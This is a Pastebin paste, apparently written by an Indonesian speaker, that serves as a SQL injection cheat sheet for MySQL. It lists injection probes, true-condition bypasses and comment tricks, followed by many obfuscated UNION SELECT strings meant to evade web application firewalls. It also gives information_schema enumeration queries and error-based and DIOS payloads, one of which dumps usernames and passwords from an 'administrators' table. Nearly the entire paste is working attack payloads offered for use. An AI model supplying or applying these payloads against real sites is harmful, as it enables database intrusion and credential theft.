Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [~] Chek Eror [~]
- 01. '
- 02. "
- 03. or 1=1
- 04. and 1=1
- 05. and false
- 06. and true
- • [Single qiotes]
- 01. ' or '1'='1
- 02. ' and '1'='1
- 03. ' and false
- 04. ' and true
- • [Double quotes]
- 01. " or "1"="1
- 02. " and "1"="1
- 03. " and false
- 04. " and true
- [~]Baypass True Condition[~]
- or '1
- || '1
- null' || 'a'=_binary'a
- 1' || 'a'=x'61
- 1' && '0'=x'30
- 1' %26%26 %270%27%3dx'30
- 2' && 0.e1=_binary"0
- 1 or 1.e1=0b1010
- ' || 1 like 1
- '-'
- "-"
- ' || 2 not like 1
- 110 or x'30'=48
- '1'!=20
- 1 or 20!='1'
- 2 and 2>0
- 3 || 0<1
- 12 || 0b1010<0b1011
- 0b11 || 0b1010x'30'
- 1 or 0b1
- 2121/**/||21
- 111' or _binary'1
- 1 or 2121
- 1' or 12 rlike '1
- [~] KOMENTAR [~]
- 01. -- : MySQL Linux Style
- 02. --+ : MySQL Windows Style
- 03. # : Hash (URL encode while use)
- 04. --+- : SQL Comment
- 05. ;%00 : Null Byte
- 07. ` : Backtick
- 08. -- -
- 09. /*
- 10. /**/
- 11. %23
- 12. //
- [~] order by [~]
- 01. group by -- +
- 02. and extractvalue(0x3a,concat(0x3a,(select count(*) from information_schema.columns where table_name='TABLE_NAME_HERE' and table_schema=database())))--+
- 03. Procedure Analyse()--+
- 04. and (select * from news)=(select 0)--+
- 05. /**/ORDER/**/BY/**/
- 06. /*!order*/+/*!by*/
- 07. /*!ORDER BY*/
- 08. /*!50000ORDER BY*/
- 09. /*!50000ORDER*//**//*!50000BY*/
- 10. /*!12345ORDER*/+/*!BY*/
- [~] UNION select [~]
- 01. (uNioN)+(sElECt)….
- 02. (uNioN+SeleCT)+…
- 03. (UnI)(oN)+(SeL)(ecT)+….
- 04. union (select 1,2,3,4…)
- 05. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
- 06. %55nion(%53elect 1,2,3)-- -
- 07. +union+distinct+select+
- 08. +union+distinctROW+select+
- 09. /**//*!12345UNION SELECT*//**/
- 10. /**//*!50000UNION SELECT*//**/
- 11. /**/UNION/**//*!50000SELECT*//**/
- 12. /*!50000UniON SeLeCt*/
- 13. union /*!50000%53elect*/
- 14. +#uNiOn+#sEleCt
- 15. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
- 16. /*!%55NiOn*/ /*!%53eLEct*/
- 17. /*!u%6eion*/ /*!se%6cect*/
- 18. +un/**/ion+se/**/lect
- 19. uni%0bon+se%0blect
- 20. %2f**%2funion%2f**%2fselect
- 21. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
- 22. REVERSE(noinu)+REVERSE(tceles)
- 24. /*--*/union/*--*/select/*--*/
- 25. union (/*!/**/ SeleCT */ 1,2,3)
- 26. /*!union*/+/*!select*/
- 27. union+/*!select*/
- 28. /**/union/**/select/**/
- 29. /**/uNIon/**/sEleCt/**/
- 30. +%2F**/+Union/*!select*/
- 31. /**//*!union*//**//*!select*//**/
- 32. /*!uNIOn*/ /*!SelECt*/
- 33. +union+distinct+select+
- 34. +union+distinctROW+select+
- 35. uNiOn aLl sElEcT
- 36. UNIunionON+SELselectECT
- /**/union/*!50000select*//**/
- 0%a0union%a0select%09
- %0Aunion%0Aselect%0A
- %55nion/**/%53elect
- uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
- %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
- %0A%09UNION%0CSELECT%10NULL%
- /*!union*//*--*//*!all*//*--*//*!select*/
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
- /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- union+sel%0bect
- +uni*on+sel*ect+
- +#1q%0Aunion all#qa%0A#%0Aselect
- union(select (1),(2),(3),(4),(5))
- UNION(SELECT(column)FROM(table))
- %23xyz%0AUnIOn%23xyz%0ASeLecT+
- %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
- union(select(1),2,3)
- union (select 1111,2222,3333)
- uNioN (/*!/**/ SeleCT */ 11)
- union (select 1111,2222,3333)
- +#1q%0AuNiOn all#qa%0A#%0AsEleCt
- /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
- %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
- +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
- +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
- /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
- +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
- /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
- /union\sselect/g
- /union\s+select/i
- /*!UnIoN*/SeLeCT
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- +uni>on+sel>ect+
- +(UnIoN)+(SelECT)+
- +(UnI)(oN)+(SeL)(EcT)
- +’UnI”On’+'SeL”ECT’
- +uni on+sel ect+
- +/*!UnIoN*/+/*!SeLeCt*/+
- /*!u%6eion*/ /*!se%6cect*/
- uni%20union%20/*!select*/%20
- union%23aa%0Aselect
- /**/union/*!50000select*/
- /^.*union.*$/ /^.*select.*$/
- /*union*/union/*select*/select+
- /*uni X on*/union/*sel X ect*/
- +un/**/ion+sel/**/ect+
- +UnIOn%0d%0aSeleCt%0d%0a
- UNION/*&test=1*/SELECT/*&pwn=2*/
- un?<ion sel="">+un/**/ion+se/**/lect+
- +UNunionION+SEselectLECT+
- +uni%0bon+se%0blect+
- %252f%252a*/union%252f%252a /select%252f%252a*/
- /%2A%2A/union/%2A%2A/select/%2A%2A/
- %2f**%2funion%2f**%2fselect%2f**%2f
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
- /*!UnIoN*/SeLecT+
- [~] information_schema.tables [~]
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
- /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
- /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
- [~] concat() [~]
- CoNcAt()
- concat()
- CON%08CAT()
- CoNcAt()
- %0AcOnCat()
- /**//*!12345cOnCat*/
- /*!50000cOnCat*/(/*!*/)
- unhex(hex(concat(table_name)))
- unhex(hex(/*!12345concat*/(table_name)))
- unhex(hex(/*!50000concat*/(table_name)))
- [~] group_concat() [~]
- /*!group_concat*/()
- gRoUp_cOnCAt()
- group_concat(/*!*/)
- group_concat(/*!12345table_name*/)
- group_concat(/*!50000table_name*/)
- /*!group_concat*/(/*!12345table_name*/)
- /*!group_concat*/(/*!50000table_name*/)
- /*!12345group_concat*/(/*!12345table_name*/)
- /*!50000group_concat*/(/*!50000table_name*/)
- /*!GrOuP_ConCaT*/()
- /*!12345GroUP_ConCat*/()
- /*!50000gRouP_cOnCaT*/()
- /*!50000Gr%6fuP_c%6fnCAT*/()
- unhex(hex(group_concat(table_name)))
- unhex(hex(/*!group_concat*/(/*!table_name*/)))
- unhex(hex(/*!12345group_concat*/(table_name)))
- unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
- unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
- unhex(hex(/*!50000group_concat*/(table_name)))
- unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
- unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
- convert(group_concat(table_name)+using+ascii)
- convert(group_concat(/*!table_name*/)+using+ascii)
- convert(group_concat(/*!12345table_name*/)+using+ascii)
- convert(group_concat(/*!50000table_name*/)+using+ascii)
- CONVERT(group_concat(table_name)+USING+latin1)
- CONVERT(group_concat(table_name)+USING+latin2)
- CONVERT(group_concat(table_name)+USING+latin3)
- CONVERT(group_concat(table_name)+USING+latin4)
- CONVERT(group_concat(table_name)+USING+latin5)
- [~] Eror based [~]
- • Chek versi
- = and (select * from (select name_const(version(),1),name_const(version(),1))a)
- • Chek user
- = and (select 1 from (select count(*),concat((select(select concat(cast(user() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- • Chek database
- = and (select 1 from (select count(*),concat((select(select concat(cast(user() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- • Chek Table
- = and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- • Chek Column
- = and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- = and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- = and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- • Dump data
- = and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_name,0x3a,user_password) as char),0x7e)) from administrators limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- = and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_name,0x3a,user_password) as char),0x7e)) from administrators limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- [~] Using Xpath [~]
- 01. and extractvalue(0x0a,concat(0x0a,(OUR QUERY HERE)))--
- [~]DIOS[~]
- 01. (select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)
- 02. (select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))
- 03. (Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
- 04. make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
- 05. (Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns) where@:=export_set(5,export_set(5,export_set(5,@,table_schema,0x3c6c693e,2),table_name,0xa3a,2),column_name,0xa3a,2)),@,2))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement